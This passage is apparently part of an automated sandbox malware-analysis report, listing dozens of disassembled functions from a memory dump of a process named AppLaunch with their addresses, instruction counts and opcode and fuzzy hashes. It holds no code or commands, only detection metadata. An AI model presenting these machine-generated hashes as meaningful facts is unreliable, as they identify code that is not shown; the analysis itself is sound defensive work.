                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 66d30674209500f00800ae1a6b53d912b9afa7ab9ac891a9b70ecbfbc300a1c7
                                                                                                                                                                    • Instruction ID: 3b2bd76b1a236b607743e91b4c008b0d4eca7710c9eeffe5f52447f16240c221
                                                                                                                                                                    • Opcode Fuzzy Hash: 66d30674209500f00800ae1a6b53d912b9afa7ab9ac891a9b70ecbfbc300a1c7
                                                                                                                                                                    • Instruction Fuzzy Hash: 9931A731E0070A8FCB11AFB8C4241AAB7B1EF85314B10863ED956B7741EF74A942CBD1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04918AE8 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 96ee722435091075f4af196e45958de1ecf6b82c79beaae17f72241ed834c0fc
                                                                                                                                                                    • Instruction ID: ee00b7491fd80e1b211ace834e5633e524492a6a20fc5eb24bf7fdcfcef00518
                                                                                                                                                                    • Opcode Fuzzy Hash: 96ee722435091075f4af196e45958de1ecf6b82c79beaae17f72241ed834c0fc
                                                                                                                                                                    • Instruction Fuzzy Hash: 3E318431F0060A8FCB15AFB9C4242AAB3B5EF85304B10853ED956A7741EF35A982CBD1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491DE52 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 41e386b3db8aae612240f4ae2734d430c099ec7a0c130fca1b4572ff8b1b1b11
                                                                                                                                                                    • Instruction ID: 42bdb6fc0fe5673ed7263b734b48ee11730622aa7ea84c949450bfa451eaded0
                                                                                                                                                                    • Opcode Fuzzy Hash: 41e386b3db8aae612240f4ae2734d430c099ec7a0c130fca1b4572ff8b1b1b11
                                                                                                                                                                    • Instruction Fuzzy Hash: B221C135B042058FEB14DB78D8587AEBBE2EF88310F10467DD406DB3A2DE30AC468B91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491403F Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4272a5a2918f4dd222633a8e61d9c0df23de4ea52d3510a2f75d15857e8c7f33
                                                                                                                                                                    • Instruction ID: 69d848c325c400a1f3c88c39607d9828206bc998270170bfae4208be07bf7ed2
                                                                                                                                                                    • Opcode Fuzzy Hash: 4272a5a2918f4dd222633a8e61d9c0df23de4ea52d3510a2f75d15857e8c7f33
                                                                                                                                                                    • Instruction Fuzzy Hash: C52104302052900FD705B778A1A45AE3FA3EEE221931848BDE546CFA53DD6C680797AA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04915830 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: edf8b5aaa24cbc83bee9913798a280a7b1a7c38a4f3bc888c8b5a7d3255bf410
                                                                                                                                                                    • Instruction ID: 02cd5c6a106555b412197c57e5a357d4be3860958c9e4130de8e2f427615c79a
                                                                                                                                                                    • Opcode Fuzzy Hash: edf8b5aaa24cbc83bee9913798a280a7b1a7c38a4f3bc888c8b5a7d3255bf410
                                                                                                                                                                    • Instruction Fuzzy Hash: 2121923120438D9FC710DF29C89088B7BA6AF92318702CE69F4498F662E774BD098BD1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491BBB0 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 680f8049d87d70c5675b6b96bd0d55e0e591da8e59a2662046ce0d9f7d5eb312
                                                                                                                                                                    • Instruction ID: 28781bc5789e5c628ffdc7b3739104892323c134e29c36029b04aaf358deec60
                                                                                                                                                                    • Opcode Fuzzy Hash: 680f8049d87d70c5675b6b96bd0d55e0e591da8e59a2662046ce0d9f7d5eb312
                                                                                                                                                                    • Instruction Fuzzy Hash: F321A930304194CFD71A6BB9A2693793AA7DB41645B40453DE547C7B93EE35F802C751
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491BBA0 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 89aa487736dd02782646eb76b70f214862aa957db04c6b914dbc14971970ae1f
                                                                                                                                                                    • Instruction ID: 832a9706c9f65083f9881fb887ab35eb52313c245691880560d0b328f940b2a3
                                                                                                                                                                    • Opcode Fuzzy Hash: 89aa487736dd02782646eb76b70f214862aa957db04c6b914dbc14971970ae1f
                                                                                                                                                                    • Instruction Fuzzy Hash: 3221B2703082E8CFD7166BB9666A2793FABEB52502740457DE447C7A63EF24B802C761
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491DB6F Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 949729864157e9059bd4cc2f9de2406339a2532cd22428de04354b4c26c24328
                                                                                                                                                                    • Instruction ID: 9dd0963c1ac9c2873a96e98dc28585f35a4391b8385c2703d95e2cef27bbcd84
                                                                                                                                                                    • Opcode Fuzzy Hash: 949729864157e9059bd4cc2f9de2406339a2532cd22428de04354b4c26c24328
                                                                                                                                                                    • Instruction Fuzzy Hash: E821B235A45248AFCF01CBA8D844EEDBFB2EF8A310F144269E406AB371C735AC42DB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04914C10 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 6581144328f7b27e498a465d7885ce10522ab05fee25d489fa013820eeedb4f1
                                                                                                                                                                    • Instruction ID: a2884a2ec4914730f131a4b38bfa445efa04d054b242add03f77d3a43b778336
                                                                                                                                                                    • Opcode Fuzzy Hash: 6581144328f7b27e498a465d7885ce10522ab05fee25d489fa013820eeedb4f1
                                                                                                                                                                    • Instruction Fuzzy Hash: 86314975900305EFCB01DFE4ED66A6E7FB2FB88300F049418FA025A262D73A5966EF51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491C078 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e995506012970d350625f261d1c451d7aa50039d7c0879417e26eebd7d51009f
                                                                                                                                                                    • Instruction ID: e819fb8e145ac4ccf5621820a578e78096c1353a78c2cec5bf6dacb349242ea0
                                                                                                                                                                    • Opcode Fuzzy Hash: e995506012970d350625f261d1c451d7aa50039d7c0879417e26eebd7d51009f
                                                                                                                                                                    • Instruction Fuzzy Hash: 53118130B0070A9FC700EF69D44095EB7B2FFC5314B108929E4065B765EB74BD0A87E5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049111C0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b924ce45e47ecdf8f515d4f142f76ba467ffad21fbcc682a82dacac144f81c77
                                                                                                                                                                    • Instruction ID: 6838b57235c813dd5662bbb6ae09e70553e03098f6c6ced3982c74761d02ce93
                                                                                                                                                                    • Opcode Fuzzy Hash: b924ce45e47ecdf8f515d4f142f76ba467ffad21fbcc682a82dacac144f81c77
                                                                                                                                                                    • Instruction Fuzzy Hash: AD21A274E06218AFCB04DFA9E9946DDBBF6FF88310F10612AE906B7251EB346941CB54
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04915860 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 142a0acb67e3a72efd1b08998c22924518375e9b3f54f309c468b25ec55cbe6e
                                                                                                                                                                    • Instruction ID: 09b10f3c569917393a1d5f0361674195087457df3d227bf0cd12b615bc27d2ec
                                                                                                                                                                    • Opcode Fuzzy Hash: 142a0acb67e3a72efd1b08998c22924518375e9b3f54f309c468b25ec55cbe6e
                                                                                                                                                                    • Instruction Fuzzy Hash: 6C110D3120064E9BC720DF29D88088EB7A6FF95318701CE28F4494B665EB74FD098BD0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04914190 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b703ae2eed6bb4661b9f00d6ab82d8028bf728b486fee8589af93d1063795ee2
                                                                                                                                                                    • Instruction ID: e1a21622556bb922e24e6836c9c1f8aee036c3dfb248268057601adbea74bcb8
                                                                                                                                                                    • Opcode Fuzzy Hash: b703ae2eed6bb4661b9f00d6ab82d8028bf728b486fee8589af93d1063795ee2
                                                                                                                                                                    • Instruction Fuzzy Hash: 3011D030105B508FC711DF65E44469ABFF2EFC5315B08896ED48787A62DB75A80ACF91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04911277 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ff9a35656ac9c5e0991bac8fc38849baffce80619f35740d0e77a89b17006153
                                                                                                                                                                    • Instruction ID: ee630e027004e5684207d94a59530735fc253460b4ab91e7163ece77f52f91b6
                                                                                                                                                                    • Opcode Fuzzy Hash: ff9a35656ac9c5e0991bac8fc38849baffce80619f35740d0e77a89b17006153
                                                                                                                                                                    • Instruction Fuzzy Hash: BA113675D042598FCF04DFA9D4545EEBBB2FF89300F10406AC905B73A1EB355A06CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04916D40 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: fee9fbd9637f8d46582674ef4e83be6a1feace3fde0ac5c5c6440b54199f31c0
                                                                                                                                                                    • Instruction ID: aa7c1f34060d36611fffd1fa0510cb302a11d130aa72969d7ed6e3477bb17a0f
                                                                                                                                                                    • Opcode Fuzzy Hash: fee9fbd9637f8d46582674ef4e83be6a1feace3fde0ac5c5c6440b54199f31c0
                                                                                                                                                                    • Instruction Fuzzy Hash: 2C11C476A096849FCB128B3488148D93F71BE9631571541EED985CF322C3359C16CFA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491D450 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f5ffa35869300c1c6cd856f517c878472ac11af5e748ae97ee4922217b638e09
                                                                                                                                                                    • Instruction ID: 093812d045edc22a1e82e6bf88f43f293a60a19fff48aaa4d1d74d4400264e23
                                                                                                                                                                    • Opcode Fuzzy Hash: f5ffa35869300c1c6cd856f517c878472ac11af5e748ae97ee4922217b638e09
                                                                                                                                                                    • Instruction Fuzzy Hash: A5018B307003148FC721AB74984862AB7E7EBC921AF10487DE64787792CEB9FC068764
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491DF88 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: bad2092e982231e731b5ec3c8d2eba5b3c7d48c083d31e6485954d27b39367d7
                                                                                                                                                                    • Instruction ID: 6583c518330df54ee1ccfaebb44f91207c7847121cd3303849c1289f0c634244
                                                                                                                                                                    • Opcode Fuzzy Hash: bad2092e982231e731b5ec3c8d2eba5b3c7d48c083d31e6485954d27b39367d7
                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11A170F052899FCB46EBB8942527E7FF29F85210F0484ABD545D7392DA344E02DB92
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04914090 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8950b1505bf25877020d9a6164d729b1260aaee3bc61e8609a68f36d9f116b45
                                                                                                                                                                    • Instruction ID: 2b3f616458caadad45b44f273371e9237219c124c5d5046484bde6366ae797ca
                                                                                                                                                                    • Opcode Fuzzy Hash: 8950b1505bf25877020d9a6164d729b1260aaee3bc61e8609a68f36d9f116b45
                                                                                                                                                                    • Instruction Fuzzy Hash: 61017C312012114F9784B7B8E55452E7AA3EED531A344893CE6068BF42EE7C7C0747AA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491C068 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1f0e93b48c7f45389db3826ecf19081bc3d93e11af168522631662841cd1e768
                                                                                                                                                                    • Instruction ID: 8c9b047c0cbb1c9d3abd7c77c8e64b6ff3de0b27888d8c05af90821093f67fab
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f0e93b48c7f45389db3826ecf19081bc3d93e11af168522631662841cd1e768
                                                                                                                                                                    • Instruction Fuzzy Hash: 3401FC306007599FCB11DF38E85099EBFB1FF82314B104A69D1469B262DB74780A87E5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491EF37 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1c06215d379565f24389920938d96fc8343726be3658cf53c04a159b38e8ba11
                                                                                                                                                                    • Instruction ID: 96fabe7a0a81c23a022c7a968d85a4eece610117999fac36a23de16e58670da1
                                                                                                                                                                    • Opcode Fuzzy Hash: 1c06215d379565f24389920938d96fc8343726be3658cf53c04a159b38e8ba11
                                                                                                                                                                    • Instruction Fuzzy Hash: 450147326013824FD7119B25D89451B7FA6EFD621030888BED94ACB762DB34AC458772
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04911288 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 30e8c3c3a2f2d878727f32d1bd251bb03c0c562cc9d7121c6e536daec64f8013
                                                                                                                                                                    • Instruction ID: cb1138b36bec4c39c8c9fb62fb804f54e81c0adddbc94c00ea201cefce590200
                                                                                                                                                                    • Opcode Fuzzy Hash: 30e8c3c3a2f2d878727f32d1bd251bb03c0c562cc9d7121c6e536daec64f8013
                                                                                                                                                                    • Instruction Fuzzy Hash: C411F074E00219DBCF08DFA9D4049EEBBB6FF88301F10846AC505B7360EB356A01CBA4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049114A9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 12760f46eafb70c8445bf02c161a29c05d76d4b3fbefd168af6ede220906b3b9
                                                                                                                                                                    • Instruction ID: b48999892f4e5abe177833317a3fa02c4907fdc4d95796d1dbfbfd9ce696f315
                                                                                                                                                                    • Opcode Fuzzy Hash: 12760f46eafb70c8445bf02c161a29c05d76d4b3fbefd168af6ede220906b3b9
                                                                                                                                                                    • Instruction Fuzzy Hash: 98010CB4D05259EFCB01DFA4D5492EDBFF0FB09300F1095AAC516A7291E7345A42DF91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491CBC0 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 948569a7158fe5fedde3243e1eb3494d03a4b0418b2bede7ea865b2352294b61
                                                                                                                                                                    • Instruction ID: 41f57e9972ccc47ed7d70657f8d06a97c699fa6619767ca0163868305a424e89
                                                                                                                                                                    • Opcode Fuzzy Hash: 948569a7158fe5fedde3243e1eb3494d03a4b0418b2bede7ea865b2352294b61
                                                                                                                                                                    • Instruction Fuzzy Hash: 9001B8342046858FC700CF29E584C9ABBF2EF85314715D4AAE446CBB32CBB0EC02CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049186D4 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a9dc596f89aac13214b417555b334fffd8fa2980123d73e04152dc819c4b2826
                                                                                                                                                                    • Instruction ID: 544ae9f07453d3cace9ae4ecdb23a09607325798730f3b8e5876b648fd254310
                                                                                                                                                                    • Opcode Fuzzy Hash: a9dc596f89aac13214b417555b334fffd8fa2980123d73e04152dc819c4b2826
                                                                                                                                                                    • Instruction Fuzzy Hash: 6301493090D3D48FC311E7BEA8944657FA1AD93248384CDEED18ACBA77DE647409D3A5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04916CD0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8bf8cd79df5ea3f912d941a36fd1cbcdff92f92a9af4ec262d0225ce9f44de83
                                                                                                                                                                    • Instruction ID: 283254baa59ad7bd4e555f07aabf870ea416d2f9f0e146b36d7e7438fb678c01
                                                                                                                                                                    • Opcode Fuzzy Hash: 8bf8cd79df5ea3f912d941a36fd1cbcdff92f92a9af4ec262d0225ce9f44de83
                                                                                                                                                                    • Instruction Fuzzy Hash: 94016D346092849FCB01DBB4C9288A97FB6AF5A20471484EEE949CB363DA36DC11CB51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491EFD0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
